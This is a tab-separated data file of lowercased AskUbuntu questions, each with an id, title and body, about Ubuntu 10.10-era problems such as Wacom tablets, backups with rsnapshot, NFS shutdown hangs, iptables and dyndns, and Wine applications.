6575	ca n't empty trash folder in evolution	i upgraded from 10.04 to 10.10 , started my evolution , deleted some messages , and now i can not empty the trash folder ... even ctrl+e could not help . i always get an error message : something went wrong in my home 's hidden ( ? ) mail directory . is this a 'normal feature ' of the new default mail program of ubuntu 10.10 ? i hope not !
6578	how to set clutter flow permanent for pictures folder on maverick	i would like to make the clutter flow on the maverick permanent for the ~/pictures folder . when i close nautilus clutter flow resets and i have to again press f4 and resize the area . which defeats the purpose of an eyecandy app imo . is there a way to set to permanent for the pictures folder . thanks gaurav butola
6584	what is the difference between the ubuntu and ubuntu beta font ? is it worth using ?	is there a way to install the new ubuntu font to be used throughout ubuntu ? what is the difference with the 3 fonts : ubuntu , ubuntu title , and ubuntu beta ?
6585	how to increase the resize margin with compiz ?	using the ambience theme in combination with compiz makes the resizing for many windows almost impossible without using the context menu and not nearly all windows provide a resize corner . what 's the best way to increase the window margin to a reasonable value ?
6586	what native games are available ?	this question exists because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . see the faq for more information . what games are available that run natively on ubuntu ? please limit one game per answer - and include why you enjoy the game .
6587	can not assign keys to wacom scroll wheel anymore	my wacom graphire 4 used to work perfectly well until , i think , ubuntu 10.4 . at that point something changed in the configuration and i could n't assign a key to the scroll wheel anymore ( note : the pad 's scroll wheel , not the mouse 's ) , i.e this command : xsetwacom set `` wacom graphire4 6x8 pad '' abswdn `` key + '' returns silently without error but nothing happens . same goes for abswup , relwdn , relwup . apparently though the problem is even deeper as pressing the wheel in a xev window does n't seem to have any effect . moreover i am thoroughly confused on how the various pieces ( kernel driver , xorg driver , evdev , hal , xinput ? ) are supposed to work together and if the wacom module that ships with ubuntu is the one from linuxwacom or not . any ideas ? i do n't want to become an x.org hacker just to understand what 's going on ... it used to work ! note : i have already read question 3940 , but that 's not the same problem .
6588	is there a visual studio style tool/ide ?	i have been developing in the windows space with visual studio for a while now with work , but i have also been using ubuntu for a while and am keen to get into some software development for linux . i should also note . i am not looking for .net and i am aware of mono . i am also familiar with c++ development and some python , so the language is n't so much relevant as the `` all in one '' aspect . i was interested to know if there is a useful all in one code/debug/design ( gui ) ide similar to something like visual studio but for linux ?
6595	do you have to deactivate or deinstall gnome-screenshot when using shutter ?	in relation to this question : http : //askubuntu.com/questions/6558/screenshot-tools-for-ubuntu is it advisable to deinstall or deactivate gnome-screenshot when installing and using shutter ? or does n't it make any difference ( e.g . is there two daemons running now ? ) ? activating shutter works perfectly , i 'm just wondering whether the system gets bloated when installing a second tool to override the first one .
6602	how do i specify mounted windows shares as a command line path ?	i can connect to a windows server using the gnome places - > connect to ... dialog , and then i can access the files using nautilus . now , how can i specify a file or folder in the share on a command line ? for example , i have this share `` c $ on winserver '' . i would like to specify this location as a path for commands like ls , cp etc .
6603	how do i install a wacom bamboo fun ?	i own a wacom bamboo fun cth-661 and would like to know how i make it work on ubuntu 10.10 . i am a linux newbie trying to migrate from windows , so it would be wonderful to have a step-by-step answer . many thanks !
6604	is there a filevault alternative for ubuntu	is there a filevault alternative for ubuntu that i can download from the software centre ?
6615	how can i can clone or ghost my system drive to restore it to a bigger hd ?	how can i can clone or ghost my ubuntu system drive to restore it to a bigger hd ? something like norton ghost does with ntfs or fat on windows .
6618	letting modifier keys act as toggles under x	is there any way to let the shift , ctrl and alt keys behave as toggles under x ? i know how one could do it under cli ( for example , by doing this ) but found no reference for doing so under x . please note that this is not a question on sticky keys , which can be enabled by an accessibility option .
6620	how to fix nx server after upgrading to maverick	i 'm using nomachine nx free edition ( not freenx ) after upgrading ubuntu from 10.04 to 10.10 , applications in remote sessions do not show a window title . has anyone experienced a similar issue or knows what might fix it ? i 'm running nxserver 3.4.0-14 ( x64 ) update ( 2010-11-12 ) : this has been fixed in the latest nx windows client
6623	getting the list of available parameters for a wacom device	how would one go about obtaining the list of parameter names for a recognized wacom device that can be manipulated with the xsetwacom tool ? to be more specific , i 'm looking for names applicable to < param > below : xsetwacom set < wacom_device > < param > < value >
6628	auto select user on login screen	i am new to ubuntu ( 10.10 ) , migrating from windows 7 and i want to setup my login screen so it auto-selects user ( there is only one user profile on my system ) and that it asks for my password so i can enter my password and tap `` enter '' and login without touching my mouse . when i choose `` login as [ my_user_profile_name ] automatically '' it logs me in without asking for a password i 've `` googled '' and found one similar issue but it did n't help me . http : //newyork.ubuntuforums.org/showthread.php ? p=8580922 is this possible to set-up ?
6629	best fs for ssd as of 10.10	given what i think is a common scenario : ssd used as boot disk conventional hd ( s ) for bulk storage ubuntu 10.10 what 's the best stable filesystem to use on the ssd ? i 'm ruling out nilfs and btrfs because they are not stable as of 10.10 . i 'm expecting to either put /home on the raid or at least back it up regularly , so the reliability difference between ext 2 and ext 3 does n't seem like it should be an issue .
6642	buttons on my bluetooth headset are n't working	i have noticed , that although my `` bluetooth headset '' works perfectly fine , buttons on it , like previous , next , play etc do not . why is that ?
6646	how to enable hp pavilion tx1000 touch screen ?	after i upgrade from ubuntu 10.04 to ubuntu 10.10 , i can not used my touchscreen anymore ? what steps can i take to get it working again ?
6654	mounted nfs shares interrupting shutdown ?	i use nfs to share media to all my files on my network . however in 10.10 when the share is mounted my machines can not shutdown , they seem to sit there . when i do n't mount the nfs shares the machines shut down normally . here are the relevant contents of my /etc/fstab . 192.168.1.115 : /home/jorge /home/jorge/stuff nfs rw , hard , intr , fsc i am currently using cachefilesd to cache my nfs shares , however i get the same problem with or without it . the server is always running and serving the shares . how can i debug where the problem is ? it seems i can only shutdown by power cycling the boxes .
6655	choppy audio/video playback experience	i am using ubuntu 10.10 since its beta release . i had been updating it regularly . sine the day of up-gradation the audio and video playback is choppy regardless of any format . i waited until 10th of october . this was not an issue in lucid . how to resolve this problem .
6656	black screen and blinking cursor on boot	i 'm having trouble booting into ubuntu 10.10 on my laptop . when i turn it on , i get the bios menu and then nothing but a black screen with a blinking text cursor at the top . i was able to boot from the cd , but ca n't my system back up . any ideas ? i do n't see anything at all except for the bios splash . i do n't have a grub menu , but if i hold down shift while rebooting , when i let go , `` grub '' appears at the top left corner , but then nothing happens . it 's a system76 pangolin laptop display resolution 15.6 '' hd+ led display with super glossy surface ( 1600 x 900 ) graphics ati mobility radeon hd 4570 graphics with 512mb gddr2 memory hard drive 320 gb 7200 rpm sata ii memory 4 gb â ddr3 1066 mhz 2 dimms optical drive cd-rw / dvd-rw processor core i7-620m processor ( 32nm , 4mb l3 cache , 2.66ghz / 3.33ghz turbo mode ) wireless 802.11 b+g+n wireless lan module
6659	how to rdiff-backup / rsnapshot / backupninja from local to remote machine ?	i 'm a bit confused about doing backups with rsync/rdiff-backup / rsnapshot via ssh . i 've been looking at utilities such as backupninja and rsnapshot . these are rsync / rdiff based backup systems , capable of being scheduled to do backups over ssh . reading the manual pages , it seems to be leading me to believe it is only possible to configure these utilities to pull from the client to the server , whereas i thought it was possible to schedule these to push to the server from the client . am i mistaken here ? meaning : i want to have my laptop running the rdiff-backup / rsnapshot utility via cron to back up to my home server . my laptop runs cron job nightly ( if it 's on home network ) ... and connects via ssh to my home server , ( because my server has the static ip address and not vice versa ) laptop pushes data to backup directory on server . if laptop is not on home network , it does not perform backup . am i doing this backwards ? ... update : i have currently installed rsnapshot on the server machine , and gotten it running pulling backups manually from the laptop , but i still think this seems to make more sense to have the laptop push to the server , because it 's only going to be connected at home intermittently . still waiting for a response on whether this is the proper way to be doing this , or whether the reverse order ( server pulling from laptop ) is appropriate method . input please ?
6663	what happens if rsnapshot / rdiff-backup gets interrupted in the middle of a transfer ?	question says it all : what happens if rsnapshot or rdiff-backup gets interrupted in the middle of a transfer ? i know that rsnapshot tries to make a complete snapshot of your system in rotating fashion , and rdiff-backup makes a differential backup , which is going to be based on the files previously saved behind it . so : what happens if it gets interrupted in the middle ? does this result in an `` incomplete snapshot '' ? will other snapshots which are dependent on this one be corrupted ? ( surely not , but ... ? )
6665	banshee wrong play queue behavior	it happens that when i put songs on the play queue and then they sound , the last song is not marked that already had sounded , and then ( on shuffle mode ) sounds a random song , and if i press to the next song , sounds the last one from play queue that never was marked as played , then the same thing , always play a random song and then the same song in the queue , this i manually mark it as played . i 'm using banshee 1.8.0
6669	after connecting through my work 's vpn , why ca n't i access resources using dns ?	i followed the below guide which allows me to access my work 's resources via vpn . following the guide worked perfectly . http : //www.ubuntugeek.com/how-to-setup-cisco-vpn-using-vpnc-ubuntu-jaunty-9-04.html however , i can only access networked resources via ip address . using the dns name does not work . why is that ? what can i do to resolve ( ha ha ) this issue .
6676	why is there no option to login as root ?	why does ubuntu not allow the gui users to login as root at the time of system start up like administrator in windows ? why they are restricting us to login only through the terminal ?
6677	how do i banish the `` you have just inserted an audio cd . '' dialog forever ?	sometimes when i insert an audio cd i get a dialog that says `` you have just inserted an audio cd . choose what application to launch . '' it does n't show up for every cd ... probably something like once for every 5 cd insertions . every single time i select `` do nothing '' and ensure that the `` always perform this action '' checkbox is checked . i assume the point of the checkbox is to let me make the decision once and for all , but this dialog continues to reappear periodically .
6683	is there any ppa for ralink 3090 64bit ?	is there any ppa for ralink 3090 64bit ? i have just added this markus-tisoft ppa but i have not found any driver for ralink 3090 yet in synaptic package manager . ( it is only available for 32bit only ) . for now , i have downloaded manually . but i hope this ppa available for 64bit arch so i can get it updated automatically . or any ppa for this 64bit ?
6684	preseeding ubuntu server	i am in the process of creating an automated install disc for ubuntu server 10.10 . is it possible to setup package selection within the preseed file ( what groups of packages to install etc. ) ? if so how can this be done .
6685	virtualbox : ubuntu host and ubuntu guest . where is my shared folder in the guest ?	i am running virtualbox ose in an ubuntu lucid host . the guest system is also ubuntu lucid . i 've set up a host directory to share with the guest via virutulbox 's shared folders . this directory is owned by the same user who is running the vm . the permissions on the directory are : drwxrwxrw i 've installed virtualbox-guest-additions ( via synaptic ) i ca n't find the shared diretory on the guest . i 've looked high and low , in /media and /mnt ... nothing ! i managed to share the same directory with a windows guest , but i am familiar with windows ... am i just missing something simple ?
6696	how to share a remote mounted folder using sshfs ?	i used the sshfs app to mount a remote folder . the problem now is that i ca n't seem to share it . i can see all of it 's contents when i directly do an ls and i also see it in the mount list when i run the mount command . i mounted the folder on a folder i had shared ( using samba ) which i could see in my windows explorer ( windows 7 64bit ) . i could n't see the mounted folder after i mounted when i umount i can see it again . i tried sharing the folder directly in the smb conf but it did n't do anything . can anyone help me out please ? edit : i have done what janc told me and i do see it know in the explorer window the only problem is i ca n't access it . it says i do n't have permissions . anyone ?
6698	can files/directories deleted from terminal be restored ?	is it possible to restore files/directories which are deleted from terminal using rm and rm -r ? . if a file is deleted from graphical interface , it could be restored from trash , but how do you restore a file if it is removed from terminal ? .
6705	how safe are my files in /home ?	this is a community wiki . i would really like other folk 's thoughts on this . i do not want to discuss the ethics of storing plain text passwords either . for those unfamiliar , libpurple is the library used by pidgin , and when you choose to save your passwords , it does so as plain text under ~/.purple/accounts.xml . the reasoning behind this is that if someone can access your user account , you have bigger problems to worry about , among other valid points . my main worry is that i use my gmail account in pidgin , and so my gmail password is stored in plain text . access to someone 's email means access to 90 % of their other accounts , via password recovery features on most sites . eeek . consider that ... my /home is encrypted , if someone gets physical access to the drive i always lock my system when i walk away i 'm sensible about installing unofficial packages any application i run in userland has access to my user files how safe is this really ? are there any other threats that could potentially access accounts.xml ? update thanks for the replies ! so far have : manage your firewall use applications that store sensitive info securely ( ie via gnome keyring ) use strong passwords and keep your system updated symlink sensitive files from an encrypted ~/private directory i 'm happy that my data is safe in case of theft . i 'm more worried about some process crafted to target these unsecured files . then again the nature of open source software makes it difficult for malicious apps , as public code review will expose the malicious code . if you you can think of any other vectors through which these account details could be accessed , i 'd like to hear them : )
6706	what is the difference between openoffice and the newly created libreoffice ?	what is the difference between openoffice and libreoffice ? i understand that libreoffice is another fork that is going to be developed . i have used openoffice since v1 and am wondering if there is a definite advantage to uninstalling and trying libreoffice .
6710	how can i use bitmap fonts in gvim ?	when doing actual work , i ca n't stand the scalable monospaced fonts that are available to me with the default install . how can i make gvim use the good old 6x13 x11 font ?
6714	iptables allow dyndns domain name and auto update rules	i have registered with dyndns domain for my dynamically changing public ip address to use with iptable rules . on a server i 've allowed some ports for this domain in the iptables configuration like the below entries : -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 22 -j accept -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 3306 -j accept -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 21 -j accept but when ever my modem restarts , i could n't connect to these allowed ports as public ip changes with modem restart and are not updated in the iptables on the server . is there any option to automatically update iptable rules on server .
6718	clone system and auto replicate the changes	is it possible to clone an ubuntu system and if any changes are made to original system , those should be replicated to the one cloned ? i need to have backup support if original one gets down . in my case , ubuntu is a cloud server . please guide me step by step .
6720	how do i install wmware workstation ?	i tried to install `` vmware-workstation-full-7.1.2-301548.x86_64.bundle '' on ubuntu 10.10-64bit ( 2.6.35-22-generic ) . it seemed to work - but then there is the wmware kernel module updater which fails with `` unable to build kernel module . '' the logfile does n't help me . it just says `` failed to compile module vmmon ! '' is this a problem of wmware , ubuntu or me ? what do i have to do now ? and why is there no `` apt-get install vmware-workstation '' -way ?
6723	change folder permissions and ownership	i would like the user to have full rights on this folder ( as well as all sub-directories and files in it ) : ~/.blabla currently owned by root . i have found numerous posts ( in this forum and elsewhere ) on how to do this for files but i ca n't find a way to do it for whole folders .
6724	how to highlight just the name ( not the extension ) for renaming ?	is there a way to turn it off so that when you 're renaming a file , it does n't highlight the extension ?
6726	how can i hide the eject icons from nautilus sidebar for permanently-mounted drives ?	i have two raid arrays that are fstab-mounted . they are as important to me as the root disk as a large portion of my home dir is mounted from one of these arrays . here 's how they look in the nautilus sidebar : when i click one of these eject icons , it errors out ( i 'd need to be root ) but that 's by-the-by , i do n't want the icon there in the first place . is there anything i can do to suppress it for certain drives ? it needs to be targeted because i still want to be able to unmount sd cards , my phone , etc .
6729	why does ubuntu use old evolution ?	in maverick , most of the gnome software are version 2.32 , but evolution is version 2.30.3 . lucid also used an older version of evolution . i think evolution is getting better and better and makes sense to ship a newer version .
6732	what 's going to be new for ubuntu 11.04 ?	i have n't been able to find information about ubuntu 11.04 . is it already decided what 's going to go into natty narwhal ?
6734	unity login blank screen	ive installed gnome 3 and gnome3 session . when i login to gnome 3 , it shows gnome 3 panels and my mouse but when i click the menu , nothing happens , it just hang over there . so i decided to remove both package , after removing , i login into my unity interface and found out that i displays my mouse but nothing else , just black screen/blank screen with mouse . how can i fix this ?
6737	switch user sends me to the lock screen - what do i need to do to make this work ?	when i select switch user from the user menu , it drops me into the lock screen for the current user , not the login screen for the new user . it used to work for me on other hardware with 9.04 . what do i need to do to make this work , or is it a possible bug ? this is an acer aspire one 751h with the cursed intel gma500 chipset . i 'm running ppa 's for x from the gma500 repository , with the basic xorg.conf device section . when i click on the change user button i get the lock screen again . i have two other test accounts which i 've successfully logged in to , but never successfully switched to .
6740	windowed sdl apps are all flickering with a sis graphics card	so when i 'm using an sdl app like wormux , the screen flickers like the app was in fullscreen to the actual desktop with the sdl window . this does n't occur on my other pcs , which use intel extreme 845g and an ati rage 128 pro . ( the ati card is using the open-source r128 driver , no support from amd )
6747	how can i reset my xwindows settings to defaults ?	i recently tried to plug my ubuntu machine into my tv via a vga cable . i just plugged it in and rebooted to see if xwindows could handle it without any tweaking ( it could n't ) . this was n't a big deal , but it seems to have screwed something up . i unplugged the tv and plugged my monitor back in and rebooted , but now i can not use full-screen flash at all . if i pull up ( for example ) a youtube video and click the full-screen button , the screen flashes , then goes back to firefox , and the embedded video disappears and is replaced with a tan box . i 've included the errors i get when i run firefox from a terminal below . *** nsplugin viewer *** warning : unhandled variable 18 ( < unknown variable > ) in npn_getvalue ( ) *** nsplugin viewer *** warning : unhandled variable 18 ( < unknown variable > ) in npn_getvalue ( ) *** nsplugin viewer *** warning : unhandled variable 18 ( < unknown variable > ) in npn_getvalue ( ) *** nsplugin wrapper *** error : npp_write ( ) wait for reply : connection reset by peer *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:2235 ) : invoke_npp_destroystream : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:2119 ) : invoke_npp_urlnotify : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:1923 ) : invoke_npp_setwindow : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:2533 ) : invoke_npp_handleevent : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:2533 ) : invoke_npp_handleevent : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:1854 ) : invoke_npp_destroy : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** error : npobject 0x7f6136861b60 is no longer valid ! *** nsplugin wrapper *** warning : ( /build/buildd/nspluginwrapper-1.2.2/src/npw-wrapper.c:1854 ) : invoke_npp_destroy : assertion failed : ( rpc_method_invoke_possible ( plugin- > connection ) ) *** nsplugin wrapper *** error : npobject 0x7f61348a9890 is no longer valid ! is there any way for me to just rerun the x setup bits of the ubuntu installation to get back my orignal setup ?
6751	how to play 'wmv9 ' in acer aspire one 751h ?	my fianceăš has a aao 751h . i 've convinced her that , for that machine , ubuntu ( and/or derivatives ) is a better choice than windows ( any version ) . but now she wants to install windows to play video files incoded with 'wmv9 ' because i ca n't get her notebook/netbook to run it ( the audio plays ok , but not the video ) . i 've already installed vlc , realplayer , kubuntu-restricted-extras and the first codec package from mplayer download page . when i test the same files in my notebook ( which has the same software installed , but a differente hardware configuration ) , they run ok ( both audio and video ) . does anyone have a clue about what should i do ? thx in advance !
6752	how to update ubuntu when not connected to internet	when i install ubuntu to a set of computers that are not connected to the internet , and i need to get the lastest software updates , do i still need to connect them so they download the latest updates ? or is there a better way ? download the updates in one connected pc , then copy them to a pen drive and intall it on the others ( how ? ) find an image of the installation cd with the latest updates ( possible ? ) i installed xubuntu 10.04 on a couple of pc 's with no connection . update ( 10/15/2010 ) i made a xubuntu 10.04 vm on my own pc , and i 'm downloading all updates and necessary software . i will then use one of the below mentioned alternatives to upgrade the computers . hopefuly i 'll update them next monday .
6755	b43 wireless not working on 2.6.35 kernel	after upgrading to kernel version 2.6.35 ( went from 10.04 to 10.10 ) , my wireless card stopped working . i 'm currently using the broadcom sta wireless driver ( proprietary ) . have anyone found any fix to this issue besides using a previous kernel version ? thanks !
6756	ubuntu 9.04 not starting after installation	i am a quite new user of ubuntu . i am a sr. citizen . my system is a pentium iii , asus cusl-2 mother board 512mb ram sd i installed ubuntu 9.04 on a seperate hd of 20 gb using chip 's live dvd to install . it is successfully installed . on starting the system , it also gives booting options . if win.xp is selected , it starts . but if ubuntu 9.04 option is given , it starts booting , checks all parameters and gives [ ok ] to all but stops at `` checking battery ... . '' it stops and after 2 to 3 flikkers the monitor screen becomes blank/dark ... nothing comes on it .
6761	packard bell easynote mz35 freezes when ac unplugged and wireless on	i would like to ask for some help debugging an irritating problem i 'm having with my packard bell easynote mz35 and ubuntu 10.10 . always when the laptop is connected to a wireless network and the ac power lead is unplugged—so it 's running on battery power—the system freezes . the screen turns black and shows the error glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) , although this error is completely unrelated to the actual problem . previous searches on the internet indicate that this error is unrelated to the bug i 'm experiencing . it is suggested that ubuntu tries to hibernate or suspend and that you 're seeing the black screen running 'behind ' the x server . that would explain the fact that curiously you still see—but can not move—the mouse cursor . i 've already set all the values of the gconf keys in /apps/gnome-power-manager/actions/ to 'nothing ' , disabled all power management actions i could find , but it did n't solve the problem . it is important to note that the freeze does n't happen immediately after you unplug the ac power lead . the icon in the notification area may have changed already , but the freeze only occurs when the notify osd bubble appears that tells you how many time is left with your battery . does anyone here have a clue about this problem ? a workaround or the cause ? if anyone could help me with disabling possible suspend/hibernate behaviour that might be related to this issue , that would be appreciated too . this issue has been reported as bug # 666852 .
6765	how to associate a file with a program installed in wine	i want to open images using fast stone image viewer in ubuntu . i have installed the application in wine . how to associate jpg file to always open in faststone that installed in wine .
6766	remaster ubuntu	i want to remaster ubuntu lucid in maverick , is it possible ? is there a conflict ? for example when i do the chroot , or to update the repository in the new ubuntu environment , ( from the `` iso '' which i extract ) , or something else.. and is it possible to remaster ubuntu 32bit from 64bit machine ?
6769	hibernate to a swap file	i have configured a new ubuntu 10.10 installation in a notebook to use a swap file , instead of using a swap partition . for default is not possible to get ubuntu to hibernate using a swap file , so i used this tutorial to do that , but it does some changes in grub config , it is specific to grub1 , and my new ubuntu uses grub2 . my changed `` grub config '' is now overwritten , every time after i update . does anybody know of a better way ( more automatic ) to do that ?
6770	does ssh use any compression ?	i am curious , does ssh compress its data before sending/receiving it ? if it does not by default , then can it be turned on ?
6779	grub overwrites windows boot manager after every update	error : no such device : ( hard drive serial number ) . grub rescue > thats what i get after every update , i know how to recover from this error . but i do n't want it to recur . what should i do ?
6783	install burg theme in grub	i want to change the theme of grub using burg theme , is it possible ? i do not want to install burg in my mbr , just change the default 'grub ' theme with burg theme ? or stealing the burg theme and then put it in the grub .
6784	is it possible to make indicator-appmenu ignore a specific application ?	the new indicator-appmenu in maverick breaks the lyx menu : the application menu is not shown either in the application window nor in the applet . ( see bug report . ) as a workaround while the bug is fixed , is there a way to make an exception for the applet , so that lyx would be ignored and the applet could still be used for everything else ? something akin to maximus exceptions .
6789	are there localized versions of help.ubuntu.com ?	quando a documentação oficial do ubuntu sera traduzida para o português ? when will there be an official documentation of ubuntu , that is translated into portuguese ?
6796	can not estimate remaining battery time ?	after updating to ubuntu 10.10 from 10.04 ubuntu can not estimate both the battery time and the percentage left . it just says ( estimating ... )
6800	install ubuntu or kubuntu ?	i want to upgrade my ubuntu lucid to kubuntu maverick ( with a fresh install of course ) . i want to try kde , but i have heard there are slight issues with the native qt applications compared to the gtk application equivalents - such as nvidia-settings , gimp , ubuntu software centre , and especially th esynaptic package manager ( which in detail showed the administration package / kpackagekit is not powerful yet than synaptic ) i believe we can have run gtk+ applications in kde , but gtk+ applications do not blend with the kde desktop . also java does not provide a gui for kde/qt . should i install kubuntu ( kde/qt ) or stay with ubuntu ( gnome/gtk + ) ?
6801	change default compress option in nautilus type to zip ?	on the right click menu ( in nautilus , desktop , etc ) , there is a `` compress '' option . is there any way to make `` zip '' the default format for this ?
6804	how to log boot messages ?	i 'm trying to check the boot log messages in the file /var/log/boot on ubuntu 8.10 & 9.10 and i found it empty with the message ( nothing has been logged yet. ) . the bootlogd service is running at the startup . i changed the file vim /etc/default/bootlogd # run bootlogd at startup ? bootlogd_enable=no change no to yes : # run bootlogd at startup ? bootlogd_enable=yes
6805	how can i get movable type 5 experimental package ?	i 'd like to install the movabletype-opensource package for version 5.0 i currently have ubuntu 10.04 installed . how do i install the experimental package ? do i need to add a site to my apt sources ?
6808	unable to access folder on lan since upgrade and switch to kde	i am running lucid and after installing some upgrades and switching from gnome to kde , i found i can no longer connect to the server on my office lan . i can see it on the network , but clicking on it has no effect . i seem to have the option to connect to it via different protocols - sftp , afp and also apple remote desktop ( it 's a mac server i 'm trying to connect to ) , but none of these options work . grateful for any pointers on how to sort this ! running cat /etc/mtab shows : /dev/sda1 / ext3 rw , relatime , errors=remount-ro 0 0 proc /proc proc rw 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 none /lib/init/rw tmpfs rw , nosuid , mode=0755 0 0 /dev/sdb1 /home ext3 rw 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0
6809	where do i find indicator applets ?	looking at a number of screenshots from various ubuntu articles namely the one below from omg ubuntu the user has applets for an array of programs such as dropbox , transmission , etc . is a resource for such applets , or how do i obtain and enable applets like these ? any help would be appreciated .
6810	ssh-agent ca n't open a connection to authentication agent ?	when i ssh into my firewall server , then attempt to ssh into another machine on the local network from there i get the following error : could not open a connection to your authentication agent . is there a way that i can have the agent run correctly from within another ssh session ?
6819	how to make our own repository ?	i want to create my own repository for my 'deb ' applications that i had made . what should i do or is any tutorial to create my own repository that can be integrated in package repository ? ( included in file /etc/apt/sources.list ) let 's just say i already have my own domain name like www.myapps.com . or is any solution to put my applications into launchpad ? note : my application has been already in .deb ( ready to be installed ) . there is no source code ( i just downloaded from the aplications site and recreate it into a 'deb ' with dpkg -build application-name ) .
6832	gaming on ubuntu - how far can you take it ?	i 'm looking in to gaming on ubuntu ( using playonlinux - i.e . wine ) . what is the most modern game you have run at an acceptable framerate and what hardware were you running ? did you have to tweak your wine or gfx card settings ? if so , how ?
6833	text boot image not pretty one , how do i get pretty one back ?	when i had 10.04 i messed around with the boot image using a tutorial online to boot with the 800x600 ubuntu boot logo . however after upgrading to 10.10 , i now just get `` ubuntu 10.10 '' in text and no pretty logo . i reverted my changes ( i backed up every file before making the changes ) , but this has n't done the trick . : ( how do i get the boot logo back how do i get the boot logo in 800x600 ? device : dell studio 15 ( i7-720qm 2.8ghz ) , 1gb ati mobility radeon hd5470 graphics card driver : ati/amd proprietary fglrx graphics driver thanks !
6842	how to add indicator-datetime to the panel ?	i 'm using maverick desktop edition and i 'd like to use indicator-datetime instead of the usual clock . i installed it using software center but even after restarting i do n't find it in the `` add to panel '' list . maybe i 'm trying to install it in the wrong way ? or should i add that indicator using terminal ? if so , could you tell me how to do that ? thanks in advance !
6845	what is the function of procfs ?	sysfs makes perfect sense -- it represents the system , and is mounted under /dev . procfs , which gets mounted to /proc , is much more nebulous however . what are procfs & /proc used for ?
6848	is there any way or theme that shows one applications ' menu bar next to its title ?	i 'm looking for a way to put the menu bar on the same line of the title bar if the latter fits in the former . is there anything like that out there ?
6849	how to create deb package from windows applications ?	i want to make a deb file from a windows application which will be run with wine . how do i make it ? as an example , i use ubuntu christian edition and i find the application virtual rosary is installed by default . my plan : my application will be put in the folder /opt/*application-name* , and for the 'launcher.desktop ' , the exec argument will bi filled with : exec= wine /opt/application-name/ application-name.exe
6853	is there a free service like hotspot shield for ubuntu ?	i use hotspot shield ( free vpn ) on the window side when i 'm out of the house . do anyone know of a similar tool or service for ubuntu ?
6854	how to use network scanner ( samsung clx 2160n )	i have a samsung clx2120n multi-functional ( scanner , printer and copier ) and this is connected to router ( home office ) , i have two computers and one notebook in the network , but no has a server printer , all equipment send jobs for print direct , they have a network printer configured . i tried several times to install the scanner and i do n't have success . anyone have a suggestion ?
6859	is there software like mac 's 'logic pro ' ?	i 'm a hobbyist musician ; for quite a while , i used a program for mac 's called 'logic pro ' , apparently this is the industry standard application for music creation . ( indeed , at my college if you do n't have it at home you ca n't do any music courses ) so , is there anything like it for ubuntu ? please please please do n't say `` audacity '' ; logic pro does so much more then edit audio ( for example , i can quite easily create entire songs , minus the lyrics , by selecting instruments and their notes . ) and audacity is ... well ... laughable in comparison .
6860	basic analogue clock for the gnome panel ?	is there any way to get an analogue clock in the panel ? i 'm not interested in docks , only the the gnome panel , like recent versions of mac os support .
6861	chromium profile `` could not be opened correctly '' errors	for some reason i 've recently been getting a profile error on chromium : i ca n't seem to see what the problem is , is it associated with the fact that chromium thinks it has n't been shut down properly ( and even then , i ca n't see how else i 'm supposed to shut it down , other than clicking the close button ) . the result is that i can not access any of my history , bookmarks etc , something of an annoyance . what could be causing this ?
6868	adobe lightroom 3 in wine	has anyone got lightroom 3 working under wine ? as with most posts out there , i have successfully completed the install , but where the photos should be ( in grid view , loupe view or edit view ) there are only gray squares . i have run winetricks vcrun6 colorprofile corefonts vista gdiplus already , no change .
6869	places folders open in archive manager	am relatively new to ubuntu . currently running 10.10 , which was an upgrade from 10.4 , which was an upgrade from 9.10 , which was a fresh install . have never compressed anything in ubuntu , but because i wanted to use the contents of a large folder on a windows machine , i installed 7zip . using places , i navigated to the folder i wanted to compress , right-clicked , chose compress , selected 7-zip and started the compression . this took many minutes to complete ( the final 7z file is over 2.2 gb ) , but when i copied it to the windows machine , 7-zip handles it fine . however , now when i open places , the home folder , user folder , documents , music , pictures , videos and downloads all open the archive manager which gives an error message that it `` could not create the archive '' because the `` archive type not supported . '' if i open places/computer choose the usr folder from places on the left and right-click/properties on any of the folders , music for instance , there is no place to change the `` open with . '' anyone know how to get this working again .
